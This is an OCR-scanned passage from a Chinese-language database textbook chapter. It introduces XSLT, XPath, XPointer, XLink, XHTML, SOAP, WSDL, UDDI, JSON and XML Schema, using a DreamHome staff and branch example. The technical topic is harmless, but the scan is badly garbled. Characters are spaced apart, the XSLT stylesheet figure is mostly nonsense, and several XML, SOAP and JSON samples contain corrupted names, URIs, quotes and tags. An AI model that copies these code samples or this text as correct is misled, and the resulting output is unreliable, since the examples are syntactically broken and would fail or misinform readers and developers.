<STAFFLIST xmlns = "http://www.dreamhome.co.uk/branch5/" 

xmlns:hq = "http://www.dreamhome.co.UWHQ/> 


<STAFF branchNo = "B005"> 
<STAFFNO>SL21</STAFFNO> 


<hq:SALARY>30000</hq:SALARY> 


</STAFF> 
</STAFFLIST> 


30.3.3 XSL 和 XSLT 
可 扩展 样式 表 语 言 (XSL) 特 指 专门 用 来 转换 和 呈现 XML 文档 的 一 族 语言 。W3C XSL 
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工作 组 起 草 了 一 份 被 称 为 XSL 的 规范 草案 ， 最 终 被 分 解 为 三 部 分 : 

e XSL 转换 (XSLT): 一 种 用 于 转换 XML 文档 的 XML 语言 。 

e XML 格式 化 对 象 (XML-FO): 用 于 详细 说 明 XML 文档 的 可 视 格 式 的 XML 语言 。 

e XML 路 径 语 言 (XPath) : 被 XSLT 使 用 的 一 种 非 XML 语言 ， 也 能 用 于 非 XSLT 的 

上 下 文中 ， 用 于 给 出 XML 文档 的 路 径 ， 将 在 下 一 节 中 具体 讨论 。 

在 文献 中 XSL 有 时 又 被 称 为 XSL-FO。 

在 HTML 中 ,由 于 HTML 的 标记 集 是 预定 义 并 且 是 固定 的 ， 所 以 在 浏览 器 中 内 置 有 默 
认 的 样式 。 级 联 样式 表 规 范 ( Cascading Stylesheet Specification，CCS) 允许 开发 者 选择 标 
记 的 其 他 呈现 方式 。CCS 也 可 以 用 于 在 浏览 器 中 呈现 XML 文档 ， 但 它 不 能 改变 文档 的 结 
构 。XSL-FO 作为 一 个 正式 的 W3C 推荐 标准 ， 专 门 用 来 定义 如 何 展现 XML 文档 中 的 数据 
(W3C，2001a; 2006b)。 它 与 CSS 相似 ,但 功能 更 加 强大 。 

XSLT( XSL Transformations ,XSL 转换 )(W3C,2007a) 既是 标记 语言 又 是 一 种 编程 语言 ， 
因为 它 提供 了 一 种 机 制 ， 能 将 XML 结构 转换 成 另外 一 种 XML 结构 ， 比 如 HTML， 或 任意 
种 其 他 基于 文本 的 格式 (如 SQL)。XSLT 可 以 用 来 创建 网 页 的 显示 输出 ， 然 而 其 真正 的 优 
势 在 于 能 改变 基本 结构 ， 而 不 只 是 像 CSS 那样 简单 地 用 媒体 表示 这 些 结构 。 

XSLT 是 重要 的 ， 因 为 它 提供 了 可 以 动态 改变 文档 视图 和 过 滤 数 据 的 机 制 。 而 且 它 还 能 
对 业务 规则 进行 编码 以 及 从 数据 中 产生 图 形 (而 不 仅仅 是 文档 )。XSLT 甚至 可 以 处 理 与 服务 
器 的 交互 ， 尤 其 是 在 与 能 够 集成 到 XSLT 的 脚本 模块 结合 使 用 时 ， 它 还 可 以 在 XSLT 自身 中 
产生 合适 的 消息 。 图 30-9 给 出 了 图 30-5 所 示 XML 文档 的 一 个 大 概 的 XSL 样式 表 。 





<?ml Version = 1 D> | 
<xslstylesheet version="2.0" xmlnsxsl= http ergo Manse > 
: ya match = oh ， | 











L >< hd oa A A 
1 tale bade =" iy (wen "FE "> 
ee 1 . 
"th Was "#cOcOcO" use "#000000" >staffNo</th> , 
<L- repeat for other columns headings - > 





oi select= "STAFFLIST/STAFF"> 
rm 
<td un， = i of MU "STAFFNO"/></td> 
<td bordercolor = "#cOcOcO" es Of select= “NAME/FNAME"/></td> 

<!-- repeat for other elements --> 

<lt2> 
</xsl:for-each> 

</table> 
shritempine> 
</xsl:stylesheet> . 





图 30-9 图 30-5 中 XML 文档 的 样式 表示 例 
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30.3.4 XPath 


XPath (XML Path Language) 是 XML 的 说 明 性 查询 语言 ， 它 为 定位 XML 文档 的 各 个 
部 分 提供 了 简单 的 语法 (W3C，1999c，2007b)。XPath 可 以 和 XSLT (用 于 模式 匹配 ) 和 
XPointer (用 于 定位 ) 一 起 配合 使 用 ， 下 节 即 讨论 。 有 了 XPath， 就 可 以 通过 给 定 与 目录 相 
似 的 路 径 ， 以 及 路 径 上 的 零 或 多 个 条 件 来 检索 元 素 集合 。XPath 使 用 完整 的 、 基 于 字符 串 的 
语法 ， 而 不 是 一 个 基于 结构 化 的 XML 元 素 的 语法 ， 这 使 得 XPath 表达 式 既 可 以 用 在 XML 
属性 中 又 可 以 用 在 URI 中 。 

XPath 将 XML 文档 当 作 一 个 逻辑 上 有 序 的 树 结构 ， 每 一 个 元 素 、 属 性 、 文 本 和 处 理 指 
令 、 注 释 、 命 名 空间 以 及 根 都 作为 这 个 树 结 构 的 结 点 。 这 种 定位 机 制 的 基础 是 上 下 文 结 点 
(开始 点 ) 和 位 置 路 径 ， 后 者 描述 了 从 XML 文档 中 一 处 到 另外 一 处 的 路 径 ， 这 种 机 制 为 
XML 文档 中 的 元 素 提 供 了 定位 的 方法 。 可 以 使 用 XPointer 来 指定 绝对 位 置 或 是 相对 位 
置 。 一 个 位 置 路 径 由 一 系列 步骤 (step) 通过 符号 “/” 相 连 ， 这 与 目录 路 径 中 的 “/” 功 
能 相似 (由 此 位 置 路 径 可 以 推导 出 它们 的 名 字 )。 每 一 个 “/” 相 对 于 上 一 步 都 顺 树 往 下 移 
动 了 一 层 。 

每 一 个 步骤 由 一 个 基本 成 分 (basis) 和 一 个 可 选 谓词 组 成 ， 基 本 成 分 由 轴 (axis) 和 
结 点 测试 组 成 。 轴 指定 导航 的 方向 ， 结 点 测试 给 出 在 文档 中 结 点 的 类 型 (通常 是 元 素 的 名 
字 ， 但 也 可 能 是 一 个 函数 。 例 如 对 文本 结 点 可 能 是 text( 函数 ， 对 任意 结 点 可 能 使 用 函数 
node())。XPath 定义 了 13 种 类 型 的 轴 ， 包 括 parent ( 父 )、ancestor (up) (祖先 (向 上 ))、 
child ( 子 )、descendant (down) (后 裔 (向 下 ))、preceding (前 一 级 )、preceding-sibling (left) 
(最 近 兄 )、following (后 一 级 )、following-sibling (right) (最 大 弟 ) 等 。 例 如 ， 在 图 30-8 中 
的 STAFF 元 素 有 一 个 子 轴 ， 它 由 5 个 结 点 组 成 (STAFFNO、NAME、POSITION、DOB 和 
SALARY)。 谓 词 出 现在 基本 成 分 后 面 的 方 括号 中 。 当 元 素 包 含 多 于 一 个 子 元 素 时 ， 可 以 
用 [position()=positionNumber] 的 方法 来 选择 子 元 素 ，positionNumber 从 1 开始 。XPath 提 
供 了 缩写 和 不 缩写 的 语法 。 表 30-2 中 给 出 了 一 些 位 置 路 径 的 示例 。 在 30.4.3 节 将 继续 讨论 
XPath 。 


表 30-2 位置 路 径 的 一 些 示例 


位 置 路 径 含 义 
选择 上 下 文 结 点 

和 选择 上 下 文 结 点 的 父 结 点 
/ 选择 根 结 点 或 作为 路 径 中 各 步骤 的 分 隔 符 
// 选择 当前 结 点 的 后 裔 结 点 
/child::STAFF (or just/STAFF) 选择 所 有 作为 根 结 点 的 子 结 点 的 STAFF 元 素 
child::STAFF (or just STAFF ) 选择 作为 上 下 文 结 点 的 子 结 点 的 STAFF 元 素 
attribute::branchNo (or just @branchNo) 选择 上 下 文 结 点 的 branchNo 属性 
attribute::* (or just @* ) 选择 上 下 文 结 点 的 所 有 属性 
child::STAFF[3] 选择 作为 上 下 文 结 点 的 子 结 点 的 第 三 个 STAFF 元 素 
/child::STAFF[@branchNo = “B005” ] 选择 所 有 branchNo 属性 值 为 “B005” 的 STAFF 元 素 


/child::STAFF[@branchNo =“ B005” ] 


re 选择 branchNo 属性 值 为 “B005” 的 第 一 个 STAFF 元 素 
[position()=1] 
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30.3.5 XPointer 


XPointer (XML 指针 语言 ) 提供 了 对 XML 文档 中 任意 元 素 的 内 容 和 属性 值 的 访问 
(W3C，2000d，2003c)。XPointer 分 为 四 个 说 明 : 

e XPointer 架构 : 形成 一 个 可 以 标 别 XML 碎片 的 基础 。 

e XPointer 元 素 : 一 个 说 明 模 式 的 位 置 元 素 。 

e XPointer xmlns: 命名 空间 的 一 个 模式 。 

® XPointer xpointer: 基于 XPath 定位 的 一 个 模式 。 

一 个 XPointer 本 质 上 是 出 现在 URI 中 的 一 个 XPath 表达 式 。 另 外 ， 使 用 XPointer 还 可 
以 链接 到 文本 节 ， 选 择 特定 的 元 素 或 属性 ， 导 航 通过 元 素 。 还 可 以 选择 多 个 结 点 集合 中 的 信 
息 ， 这 是 XPath 无 法 完成 的 。 

除了 定义 结 点 ，XPointer 还 可 以 定义 点 (point) 和 范围 (range)， 点 和 范围 与 结 点 合 在 
一 起 就 创建 了 位 置 (location)。 点 代表 XML 文档 中 的 一 个 位 置 ， 范 围 代表 一 个 开始 点 和 
一 个 结束 点 之 间 所 有 XML 的 结构 与 内 容 ， 开 始点 和 结束 点 都 在 某 个 结 点 中 。 例 如 ， 以 下 
XPointer 选择 了 一 个 范围 ， 开 始点 是 属性 branchNo 的 值 为 B005 的 一 个 STAFF 元 素 ， 结 束 
点 是 属性 branchNo 的 值 为 B003 的 一 个 STAFF 元 素 : 


XpointerUchild::SITAFF[attribute::branchNo = "B005"] to 
/child::STAFF[attribute::branchNo = "B003"]) 


在 此 例 中 ， 这 选择 了 两 个 STAFF 结 点 。 


30.3.6 XLink 


XLink ( XML 链接 语言 ) 允许 在 XML 文档 中 插入 元 素 ， 以 创建 和 描述 资源 之 间 的 链接 
(W3C，2001b ; 2012a)。XLink 用 XML 语法 创建 可 以 描述 链接 的 结构 ， 这 些 链接 类 似 于 
HTML 的 单 向 超级 链接 和 更 复杂 的 链接 。XLink 有 两 种 类 型 : 简单 的 和 扩展 的 。 简 单 的 链接 
将 一 个 源 链接 到 一 个 目标 资源 ; 扩展 的 链接 可 以 链接 任意 数量 的 资源 。 另 外 ， 可 以 将 链接 存 
储 到 一 个 单独 的 链接 数据 库 中 ( 称 为 链接 库 ) 。 这 种 机 制 提 供 了 一 种 位 置 独立 的 方式 ， 就 是 
说 即使 链接 改变 了 ， 原 来 的 XML 文档 保持 不 变 ， 只 需要 更 新 数据 库 。 


30.3.7 XHTML 


XHTML (eXtensible HTML ， 可 扩展 HTML ) 1.0 是 采用 XML 1.0 的 HTML 4.01 的 再 版 ， 
它 将 成 为 下 一 代 的 HTML (W3C，2002a)。XHTML 基本 上 是 HTML 的 一 个 更 严格 也 更 干 
净 的 版 本 。 例 如 : 

e 标记 和 属性 必须 是 小 写字 母 。 

e 所 有 的 XHTML 元 素 必须 有 结束 标记 。 

e 属性 值 必须 被 引用 且 不 允许 最 小 化 。 

e ID 属性 取代 name 属性 。 

e 文档 必须 与 XML 规则 一 致 。 

XHTML1.1 (基于 Module 的 XHTML) 被 改进 为 能 适用 于 那些 不 能 支持 XHTML 全 部 
功能 的 小 设备 ， 整 个 规范 被 分 解 为 带 功能 限制 的 模块 。 小 设备 可 以 通过 仅 支 持 部 分 模块 来 降 
低 它们 的 复杂 性 (W3C，2010b)。 这 些 模块 有 : 
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e XHTML 基础 : 只 包括 基本 的 XHTML 元 素 (例如 文本 结构 、 图 像 、 表 单 、 表 格 和 对 
象 支持 )(W3C，2010c)。 

。 XHTML Events2 : 为 了 使 XML 语言 有 能 力 将 事件 监听 器 及 相关 联 的 事件 处 理 器 与 
DOM 事件 监听 器 统一 整合 ( W3C，2010d)。 它 支持 三 个 模块 ， 定 义 事件 及 其 特点 的 
XML Events， 定 义 事件 到 行为 的 映射 的 XMLHandlers， 以 及 辅助 定义 功能 支持 处 理 器 
的 XML Scripting。 

。 XHTML Print : 被 设计 用 来 将 移动 设备 的 内 容 输 出 到 低 消耗 的 自 上 而 下 、 从 左 至 右 

打印 的 无 缓存 的 打印 机 (W3C，2010e)。 

在 29.2.5 节 我 们 简要 地 讨论 了 Web 服务 日 益 显现 的 重要 性 ，Web 服务 是 一 种 基于 Web、 
使 用 开放 的 、 基 于 XML 标准 和 传输 协议 来 与 客户 端 交 换 数据 的 应 用 程序 。 在 29 章 后 续 章 
节 我 们 了 解 到 Web 服务 是 JEE 平台 、.NET 框架 和 Oracle 应 用 服务 器 的 核心 。 在 本 章 随后 
的 三 节 中 我 们 将 讨论 几 种 基于 XML 的 协议 ， 即 简单 对 象 访 问 协 议 SOAP、Web 服务 描述 
语言 VSDL 和 通用 描述 发 现 与 集成 服务 规范 UDDI， 它 们 对 Web 服务 的 创建 和 配置 非常 
重要 。 


30.3.8 SOAP 


SOAP (简单 对 象 访 问 协议 ) 是 基于 XML 的 消息 协议 ， 它 定义 了 一 套 构建 消息 的 规则 
(W3C，2007c)。 该 协议 除了 用 于 简单 的 单 向 消息 ， 还 可 用 于 执行 远程 过 程 调用 (RPC) 类 型 
的 请 求 响应 对 话 。SOAP 虽然 通常 采用 HTTP， 但 并 不 绑 定 任何 流行 的 操作 系统 或 编程 语言 ， 
也 不 绑 定 任何 流行 的 传输 协议 。 这 种 独立 性 使 得 SOAP 成 为 了 开发 Web 服务 的 重要 基石 。 
SOAP 的 另 一 个 重要 优势 是 ， 大 部 分 的 防火 墙 都 允许 HTTP 通过 ， 这 方便 了 点 对 点 SOAP 的 
数据 交换 (当然 系统 管理 员 可 以 选择 性 地 阻 断 SOAP 请 求 )。 

一 个 SOAP 消息 为 包含 以 下 内 容 的 普通 XML 文档 : 

e 必 有 的 Envelope 元 素 ， 用 来 将 XML 文档 标识 为 SOAP 消息 。 

e 可 选 的 Header 元 素 ， 包 含 特别 的 应 用 信息 如 认证 或 支付 信息 。 还 包含 了 三 个 属性 用 

来 指明 谁 应 该 处 理 该 消息 ， 处 理 是 可 选 还 是 强制 的 以 及 描述 应 用 程序 数据 类 型 的 编 
码 规 则 。 

e 必 有 的 Body Header 元 素 ， 包 含 了 调用 和 响应 信息 。 

e 可 选 的 Fault 元 素 ， 提 供 消息 处 理 过程 中 产生 的 错误 的 信息 。 

图 30-10 说 明了 一 条 简单 的 包含 属性 PG36 的 价格 的 SOAP 消息 。 


<?xml version="1.0"?> 
<soap:Envelope xmlns:soap="http://www.w3.o0rg/2001/12/soap-envelope" 
soap:encodingStyle= http://www:w3.org/2001/12/soap-encoding"> 
<soap:Body> 
<m:GetPriceRequest xmlns:m=" http://www.dreamhome.co.uk/prices"> 
<m:Item>PG36</m:Item> 
</m:GetPriceRequest> 
</soap:Body> 
</soap:Envelope> 


图 30-10 ”SOAP 消息 示例 
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30.3.9 WSDL 


WSDL ( Web 服务 描述 语言 ) 是 用 来 定义 Web 服务 的 基于 XML 的 协议 ， 它 指定 服务 的 
位 置 、 服 务 执行 的 操作 、 所 涉及 的 (SOAP) 消息 以 及 用 于 与 服务 对 话 的 通讯 协议 。WSDL 
文件 用 来 描述 消息 格式 的 符号 法 通常 基于 XML Schema 标准 ， 使 其 保持 与 语言 和 平台 无 关 。 
程序 员 或 自动 开发 工具 可 以 创建 WSDL 文件 以 描述 一 个 服务 并 在 Web 上 将 之 实现 。 客 户 端 
程序 员 和 开发 工具 可 以 用 已 发 布 的 WSDL 描述 来 获得 有 效 Web 服务 的 信息 ， 并 建立 或 创建 
用 来 访问 这 些 服务 的 代理 或 程序 模板 。 

WSDL2.0 用 两 个 部 分 来 描述 一 个 Web 服务 : 抽象 部 分 和 具体 部 分 (W3C，2007 )。 在 
抽象 层 ，WSDL 根据 发 送 和 接收 的 消息 描述 一 个 Web 服务 ; 消息 采用 通常 为 XML?Schema 
的 类 型 系统 描述 ， 从 而 独立 于 特殊 的 线 (wire) 格式 : 

e@ 消息 交换 模式 (message exchange pattern) 标识 发 送 / 接收 的 消息 序列 及 其 基数 ， 同 

时 也 标识 消息 的 来 源 和 去 向 。 

e 操作 (operation) 将 消息 交换 模式 与 一 个 或 多 个 消息 链接 在 一 起 。 

e 接口 (interface) 将 操作 聚合 到 一 起 ,不 需要 承诺 传输 或 线 格式 。 

在 具体 的 层 ， 绑 定 (binding) 操作 对 一 个 或 多 个 接口 指定 传输 和 线 格式 细节 。 端 点 
(endpoint) 将 一 个 网 络 地 址 和 绑 定 (binding) 关联 到 一 起 ， 服 务 ( service) 将 实现 通用 接口 
的 端点 组 合 在 一 起 。 图 30-11 解释 了 WSDL 相关 概念 。 


30.3.10 UDDI 


UDDI (通用 描述 、 发 现 与 集成 服务 规范 ) 规范 定义 了 一 个 基于 SOAP 的 Web 服务 ， 专 
门 用 于 找到 各 种 Web 服务 的 WSDL 格式 的 协议 描述 。 它 实际 上 给 出 了 一 个 充当 电子 黄页 的 
在 线 电子 注册 处 ， 通 过 WSDL 定义 给 出 各 种 业务 注册 本 身 及 所 提供 服务 的 信息 结构 。 它 基 
于 包括 HTTP、XML 、XML Schema、SOAP 和 WSDL 在 内 的 各 种 工业 标准 。 有 两 种 类 型 的 
UDDI 注 册 : 公共 ( public) 注册 作为 各 种 公司 发 布 它们 服务 的 聚集 地 ， 私 有 private) 注册 
充当 一 个 组 织 机 构 内 部 类 似 的 角色 。 这 是 各 大 主流 平台 和 软件 公司 主导 的 工业 界 联合 努力 
的 结果 ， 包括 Fujitsu、HP、Hitachi、IBM 、Intel、Microsoft、Oracle、SAP 和 Sun， 也 包括 
OASIS (Organization for the Advancement of Structured Information Standards) 联盟 组 织 的 其 
他 贡献 者 。 图 30-12 显示 了 WSDL 和 UDDI 之 间 的 关系 。 





图 30-11 WSDL 相关 概念 图 30-12 WSDL 和 UDDI 之 间 的 关系 
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UDDI 3.0 规范 定义 了 一 种 信息 模型 ， 它 由 被 称 为 实体 (entities) 的 永久 数据 结构 
的 实例 组 成 ， 这 些 实体 用 XML 表述 并 被 永久 存储 在 UDDI 结 点 上 。 可 有 下 列 实体 类 型 
(UDDI.org, 2004): 


businessEntity : 描述 提供 Web 服务 的 组 织 机 构 ， 包 括 名 称 、 业 务 描 述 、 联 系列 表 和 
所 属 类 别 ， 比 如 工业 、 产 品类 型 或 者 地 理 位 置 。 

businessService : 描述 由 businessEntity 提供 的 一 组 相关 的 Web 服务 。 包 括 对 一 组 相 
关 的 技术 服务 的 描述 性 业务 服务 信息 ， 例 如 组 名 称 、 简 介 、 技 术 服 务 绑 定 信息 和 类 
别 信息 。 将 Web 服务 组 织 成 与 类 别 或 业务 过 程 相关 联 的 组 ， 使 得 UDDI 能 够 更 加 有 
效 地 搜索 和 发 现 Web 服务 。 

bindingTemplate : 描述 使 用 一 个 特定 的 businessService 所 必需 的 技术 信息 。 包 括 一 
个 accessPoint， 用 来 传达 激活 Web 服务 使 用 的 网 络 地 址 ， 可 能 是 一 个 URL、email 
地 址 ， 甚 至 可 能 是 电话 号 码 。 

tModel (技术 模型 ) : 描述 一 个 可 重用 的 概念 ， 例 如 Web 服务 类 型 、Web 服务 使 用 的 
协议 或 者 是 一 个 分 类 系统 ， 使 得 Web 服务 的 消费 者 更 容易 找到 某 个 特定 技术 规范 兼 
容 的 Web 服务 。 每 个 不 同 的 规范 、 传 输 、 协 议和 命名 空间 都 由 一 个 tModel 来 表达 。 
tModel 的 例子 有 WSDL、XML 模式 定义 (XSD) 和 其 他 一 些 定义 Web 服务 的 契约 
和 行为 的 文档 。 例 如 ， 为 了 发 送 一 个 订货 订单 ， 激 活 的 服务 不 仅 要 知道 服务 的 URL， 
还 要 知道 订单 发 送 的 格式 、 协 议 、 安 全 需求 和 发 送 订单 后 的 响应 形式 。 
publisherAssertion: 描述 一 个 businessEntity 与 男 一 个 businessEntity 的 关系 。 
subscription: 描述 一 个 跟踪 请 求 ， 关 注 由 该 subscription 所 描述 实体 的 持续 变化 。 


实体 可 选择 采用 XML 数字 签名 加 密 。UDDI 注册 提供 的 信息 可 以 用 来 执行 下 面 三 种 


搜索 : 


White pages search 包含 地 址 、 契 约 和 已 知 的 标识 符 。 例 如 ， 用 其 名 字 或 唯一 标识 各 
搜索 一 个 公司 。 

Yellow pages search 包含 基于 标准 分 类 学 的 工业 分 类 ， 例 如 北美 工业 分 类 〈North 
American Industry Classification，NAICS )、 联 合 国标 准 产品 和 服务 代码 系统 (United 
Nations Standard Products and Services Code System，UNSPSC ) 或 者 ISO 国家 代码 
(ISO 3166 ) 分 类 系统 。 

Green pages search 包含 一 个 机 构 提供 的 Web 服务 的 技术 信息 ， 包 括 Web 服务 接口 
规范 指南 ， 也 提供 各 种 文件 的 链接 和 基于 URL 的 查看 机 制 。 


图 30-13 提供 了 UDDI 实体 的 一 个 例子 。 


30.3.11 JSON 


在 结束 本 节 内 容 之 前 ， 我 们 简要 地 介绍 一 种 可 选用 于 存储 和 交换 文本 信息 的 开放 标准 文 
法 ， 称 为 JSON Java 脚本 对 象 表示 法 。JSON 比 XML 规模 小 ， 但 是 解析 得 更 快 更 简单 。 因 
为 JSON 起 源 于 JavaScript， 所 以 它 不 依赖 具体 的 语言 ， 其 分 析 器 适 于 多 种 语言 。JSON 主要 
用 于 在 服务 器 和 Web 应 用 方 之 间 传 送 数据 ， 可 被 用 作 是 XML 的 一 种 替代 。JSON 的 基本 数 
据 类 型 如 下 : 


数字 型 Number (在 JavaScript 中 ， 双 精度 浮 点 数 )。 
字符 串 String (〈 括 在 双 引 号 中 )。 
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e 布尔 型 Boolean。 

e 数组 Array (用 逗号 分 开 、 用 方 括号 括 住 的 值 的 有 序 序列 ， 值 不 必 具 有 相同 的 数据 
类 型 )。 

e 对 象 Object (用 小 插 号 括 住 的 、 用 逗号 分 开 的 、 用 符号 “; ”分 隔 的 键 值 对 的 无 序 集 
合 ， 关 键 字 必 须 为 可 以 互相 区 分 的 字符 串 )。 


e null ( 空 )。 





<businessEntity xmlns= "urn:uddi-org:api" 
businessKey="AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA'> 
<name>DreamHome Estate Agents</name> 
<description xml:lang="en">Estate Agents</description> 
<businessServices> 
<businessService 
businessKey="AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA" 
serviceKey="BBBBBBBB-BBBB-BBBB-BBBB-BBBBBBBBBBBB"> 
<name>Credit Check</name> 
<bindingTemplates> 
<bindingTemplate 
serviceKey="BBBBBBBB-BBBB-BBBB-BBBB-BBBBBBBBBBBB” 
bindingKey="CCCCCCCC-CCCC-CCCC-CCCC-CCCCCCCCCCCC"> 
<accessPoint URLType="https">https://dreamhome.co.uk/credit:aspx</accessPoint> 
<tModelInstanceDetails> 
<tModelinstanceInfo 
tModelKey="UUID:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /> 
</tModelInstanceDetails> 
</bindingTemplate> 
</bindingTemplates> 
</businessService> 
<businessServices> 
<categoryBag> 
<keyedReference tModelKey="UUID:MK12345-678A-9123-B456-7ABCDEFG8901" 
keyName="Credit check service' keyValue="12.34.56.01.00"/> 


</categoryBag> 
</businessEntity> 





图 30-13 ”UDDI 实体 举例 


一 个 JSON 的 例子 如 下 : 


{ 

“branchNo”": “BO0S5”, 

“address”: { 
“street”: “22 Deer Rd"”, 
“city”: “London”", 
“postcode”: “SW1 4EH” 

}， 

“staff”: [ 
{‘fName”: “John”, “IName" “White”}, 
{fName”: “Ann”, “IName”: “Beech’”} 
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30.4 XML Schema 


XML 1.0 提供 了 DTD 机 制 来 定义 内 容 模型 (有 效 的 元 素 租 套 和 顺序 ) 和 在 受 限 范围 内 
XML 文档 属性 的 数据 类 型 ， 但 它 也 有 许多 局 限 : 

e 它 使 用 不 同 的 语法 ( 非 XML ) 书写 。 

e 它 不 支持 命名 空间 。 

e 它 只 提供 极其 有 限 的 数据 类 型 。 

因此 ， 需 要 一 个 更 复杂 和 严格 的 方法 来 定义 XML 文档 的 内 容 模型 。W3C XML Schema 
(XML 模式 ) 克服 了 这 些 缺 点 ， 比 DTD 的 表示 能 力 强 得 多 (W3C，2004a,b)。 这 种 附加 的 
表示 使 得 Web 应 用 在 交换 XML 数据 方面 具有 更 强 的 鲁 棒 性 ,而 不 用 依靠 特定 验证 工具 。 一 
个 XML Schema 是 一 个 具体 的 XML 结构 定义 (无论 从 它 的 组 织 还 是 数据 类 型 来 看 )。W3C 
XML Schema 语言 详细 说 明了 模式 中 每 一 个 元 素 类 型 是 如 何 定义 的 ， 以 及 哪个 元 素 关 联 哪 种 
数据 类 型 。 模 式 本 身 是 一 个 XML 文档 ， 用 元 素 和 属性 来 表达 模式 的 语义 。 由 于 本 身 是 一 个 
XML 文档 ， 它 也 可 以 采用 与 阅读 它 所 描述 的 XML 同样 的 工具 来 编辑 和 处 理 。 本 节 将 用 示 
例 说 明 怎样 为 图 30-5 中 的 XML 文档 创建 一 个 XML Schema。 

XML Schema 预定 义 类 型 

XML Schema 有 如 下 预定 义 类 型 : 

e 布尔 型 boolean， 包 含 一 个 真 值 true 或 false。 

e 字符 串 string， 包 含 零 个 或 多 个 Unicode 字符 。String 有 下 面 多 个 子 类 型 : 
曙 normalizedString: 除了 空格 键 (space) 以 外 不 包含 空 字符 (whitespace) 的 字符 串 。 
得 token : normalizedString 的 子 类 型 ， 对 标记 字符 串 没有 开头 和 结尾 空格 ， 并 且 在 

一 行 中 没有 两 个 或 两 个 以 上 空格 。 
昌 Name : token 的 子 类 型 ， 它 表示 XML 名 称 ， 有 子 类 型 NCName 和 NMTOKEN， 
前 者 表示 不 带 冒 号 的 XML 名 称 。 

和 ID 、IDREF 和 ENTITY: 均 为 NCName 的 子 类 型 ， 用 于 相应 的 属性 类 型 。 
m IDREFS 、ENTITIES 和 NMTOKENS。 
数字 型 decimal : 包含 一 个 任意 精度 的 十 进 制 实数 值 ， 与 没有 小 数 部 分 的 子 类 型 
integer。 这 个 子 类 型 又 有 子 类 型 nonPositiveInteger、long 和 negativeInteger。 同 一 层 
次 的 其 他 类 型 有 int、short 和 byte。 
浮 点 型 float : 指 32 位 IEEE 二 进 制 浮 点 数 ， 双 精度 double 指 64 位 IEEE 二 进 制 浮 
点 数 。 
。 日 期 型 date， 包含 格式 为 年 -月 -日 (例如 ，1945-10-1 指 1945 年 10 月 1 日 ) 的 日 
期 。 时 间 time， 包 含 24 小 时 制 的 时 间 ， 如 23:10。 dateTime 为 上 述 两 者 的 结合 ， 例 如 ， 
1945-10-01T23:10。 
其 他 与 时 间 相 关 的 类 型 有 duration、gDay、gMonth、gYear。 
QName: 由 命名 空间 名 称 和 本 地 名 称 构成 的 受 限 名 称 。 
AnySimpleType: 所 有 基本 类 型 的 联合 。 

e anyType: 所 有 类 型 (简单 的 和 复杂 的 ) 的 联合 。 

简单 和 复杂 的 类 型 

也 许 创建 XML SCHEMA 的 最 简单 方法 是 根据 文档 的 结构 定义 遇 到 的 每 一 个 元 素 。 包 含 
其 他 元 素 的 元 素 类 型 是 complexType。 例 如 根 元 素 STAFFLIST， 可 以 定义 一 个 complexType 
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类 型 的 STAFFLIST 元 素 。STAFFLIST 元 素 的 子 元 素 列表 用 一 个 sequence 元 素 (一 种 排序 ， 
它 定 义 子 元 素 的 一 个 有 序 序列 ) 来 描述 : 


<xs:element name = "STAFFLIST"> 
<xs:complexType> 
<xs:sequence> 
<!- children defined here -> 
</xs:sequence> 
</xs:complexType> 
</xs:element> 


模式 中 的 每 一 个 元 素 通 常 都 有 惯用 的 前 级 xs:， 这 个 前 缀 是 通过 声明 xmlns:xsd=“http:/ 
www.w3.0rg/2001/10/XMLSchema”( 它 也 是 一 个 schema 元 素 ) 与 W3C XML Schema 命名 空间 
相关 联 的 。STAFF 和 NAME 也 包含 子 元 素 ， 并 且 可 以 用 一 个 相似 的 方法 来 定义 。 没 有 子 元 素 
和 属性 的 元 素 的 类 型 为 simpleType。 例 如 ， 可 以 如 下 定义 STAFFNO、DOB 和 SALARY: 


<xs:element name = "STAFFNOY type = "xs:string'/> 

<xs:element name = "DOB" type = "xs:date"/> 

<xs:element name = "SALARY" type = "xs:decimal"/> 

这 些 元 素 用 预定 义 的 W3C XML Schema 类 型 string、date、decimal 声明 ， 前 级 xs: 说 明 
它们 属于 XML Schema 词汇 。 而 属性 ( 它 必须 总 在 最 后 ) branchNo 可 以 定义 如 下 : 


<xs:attribute name = "branchNo" type = "xs:string"/> 


基数 

W3C XML Schema 允许 使 用 属性 minOccurs (出 现 的 最 小 数目 ) 和 maxOccurs (出 现 
的 最 大 数目 ) 来 表示 一 个 元 素 的 基数 。 将 minOccurs 设 为 0， 表示 一 个 可 选 元 素 ， 把 max 
Occurs 设 为 极 大 ， 来 说 明 出 现 没 有 上 限 。 如 果 不 具体 说 明 ， 每 一 个 属性 默认 值 为 1。 例如 ， 
DOB 是 一 个 可 选 元 素 ， 可 以 表示 如 下 : 


<xs:element name = "DOB" type = "xs:date" minOccurs = "0"/> 


如 果 假 定 每 名 员工 最 多 记录 三 名 家 属 ， 可 以 表示 如 下 : 


<xs:element name = "NOK" type = "xs:string" minOccurs = "0" 
maxOccurs = "3"/> 


引用 

上 面 描述 的 方法 相对 比较 简单 〈 遇 到 一 个 元 素 时 就 定义 一 个 元 素 )， 但 这 种 散人 定义 方 
式 会 产生 很 大 的 深度 ,并 且 得 到 的 模式 难于 阅读 和 维护 。 男 一 个 可 选 的 方法 是 使 用 元 素 的 引 
用 和 属性 定义 ， 属 性 定义 应 该 在 引用 者 可 引用 的 范围 内 。 例 如 ， 可 以 如 下 定义 STAFFNO: 


<xs:element name = "STAFFNO" type = "xs:string"/> 


并 且 在 模式 中 需要 使 用 STAFFNO 元 素 时 ， 用 如 下 方式 使 用 这 个 定义 : 


<xs:element ref = "STAFFNO"> 


如 果 在 XML 文档 中 有 许多 STAFFNO 的 引用 ,使 用 引用 就 可 将 定义 只 放 在 一 处 ， 因 而 
提高 了 模式 的 可 维护 性 。 

定义 新 类 型 

XML Schema 提供 了 通过 定义 新 的 数据 类 型 来 创建 元 素 和 属性 的 第 三 种 机 制 。 这 种 机 制 
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类 似 于 定义 一 个 类 ， 然 后 使 用 这 个 类 创建 一 个 对 象 。 可 以 为 PCDATA 元 素 或 属性 定义 简单 
类 型 ， 而 为 元 素 定 义 复杂 类 型 。 新 类 型 被 命 以 名 字 ， 其 定义 放 在 元 素 和 属性 定义 的 外 面 。 例 
如 ， 可 以 为 STAFFNO 元 素 定义 一 个 简单 类 型 . 


<xs:simpleType name = "STAFFNOTYPE"> 
<xs:restriction base = "xs:string"> 
